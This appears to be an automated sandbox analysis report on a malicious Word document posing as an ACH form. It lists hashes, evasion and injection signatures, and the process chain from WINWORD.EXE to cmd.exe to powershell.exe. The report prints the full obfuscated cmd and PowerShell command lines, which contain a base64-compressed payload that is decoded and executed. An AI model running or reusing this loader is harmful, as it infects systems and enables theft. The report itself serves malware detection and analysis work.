Analysis
-
max time kernel
118s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2023 14:53
Behavioral task
behavioral1
Sample
ACHFORMJLIL09212811597717.doc
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
ACHFORMJLIL09212811597717.doc
Resource
win10v2004-20230621-en
General
-
Target
ACHFORMJLIL09212811597717.doc
-
Size
232KB
-
MD5
01e27446d5dccb690e518dd0d398294f
-
SHA1
96cc081662e2d8502a56914a754f88a0257c9e00
-
SHA256
03128d63886828689cca7198e5067843a68493d0c073bfcf22bac23b893afd85
-
SHA512
97d6e6926604394bd7a8c013bf433b70567e7206af869dc9380ae5320cd567cd41eab87a9ea408fc0fcf1dcd14aa6db93cc8678af4cb2227fae56253f6d501f7
-
SSDEEP
3072:DlFZ9MOFUca0DNB1Go08MOKXlxwJ1lPwW5RlMXvWoNwKRRWl81X9:RFzFUK6oHMxipwwKR4C3
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2508 1616 cmd.exe 48 -
Blocklisted process makes network request 7 IoCs
flow pid Process 41 220 powershell.exe 42 220 powershell.exe 45 220 powershell.exe 46 220 powershell.exe 48 220 powershell.exe 50 220 powershell.exe 56 220 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2508 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1616 WINWORD.EXE 1616 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 220 powershell.exe 220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 220 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1616 WINWORD.EXE 1616 WINWORD.EXE 1616 WINWORD.EXE 1616 WINWORD.EXE 1616 WINWORD.EXE 1616 WINWORD.EXE 1616 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1616 wrote to memory of 2508 1616 WINWORD.EXE 86 PID 1616 wrote to memory of 2508 1616 WINWORD.EXE 86 PID 2508 wrote to memory of 220 2508 cmd.exe 88 PID 2508 wrote to memory of 220 2508 cmd.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ACHFORMJLIL09212811597717.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" NwRIFdz nrwDbYcdrCEZBUZYKl iEfrXNuwRbHwF & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %tiujXiwECZYbwOn%=wFASDPJ&&set %icRrjoizjHrhUL%=p&&set %LjcsnplQt%=o^w&&set %PAZGYQlHnRctCZa%=kZndGbZ&&set %qjQWNsAqEF%=!%icRrjoizjHrhUL%!&&set %QkiksJXNKdVffwY%=oRSlKVUlfWz&&set %LtoaKKIoihQapQ%=e^r&&set %iEzUoEDrudB%=!%LjcsnplQt%!&&set %wGUtjBKCjU%=s&&set %PtQmCnbIWpjszPD%=QhtuHMwzL&&set %jDrJtLXzVuu%=he&&set %ZwjsqdwkuM%=ll&&!%qjQWNsAqEF%!!%iEzUoEDrudB%!!%LtoaKKIoihQapQ%!!%wGUtjBKCjU%!!%jDrJtLXzVuu%!!%ZwjsqdwkuM%! " . ( ([STrING]$VeRbOsePreFErENCE)[1,3]+'X'-join'')(&('NE'+'W-ob'+'JE'+'ct') ('S'+'ySTem'+'.Io.CO'+'mPrE'+'SSi'+'o'+'N'+'.DeF'+'lAtEST'+'ReAM')([iO.memORYstream] [SystEM.conVert]::FrOMbaSE64sTRINg( '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' ) , [SySTem.io.coMpREssIon.cOmpreSSioNmOdE]::deCoMpRess ) | .('F'+'o'+'ReAch-ObJEcT'){&('NEW-ob'+'JE'+'ct') ('IO.StreA'+'mre'+'aDE'+'R')($_ ,[sysTEM.TEXt.encODing]::AscII) }|.('For'+'eAcH-oBje'+'ct') { $_.reADtoEnD( ) } )2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell " . ( ([STrING]$VeRbOsePreFErENCE)[1,3]+'X'-join'')(&('NE'+'W-ob'+'JE'+'ct') ('S'+'ySTem'+'.Io.CO'+'mPrE'+'SSi'+'o'+'N'+'.DeF'+'lAtEST'+'ReAM')([iO.memORYstream] [SystEM.conVert]::FrOMbaSE64sTRINg( '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' ) , [SySTem.io.coMpREssIon.cOmpreSSioNmOdE]::deCoMpRess ) | .('F'+'o'+'ReAch-ObJEcT'){&('NEW-ob'+'JE'+'ct') ('IO.StreA'+'mre'+'aDE'+'R')($_ ,[sysTEM.TEXt.encODing]::AscII) }|.('For'+'eAcH-oBje'+'ct') { $_.reADtoEnD( ) } )3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82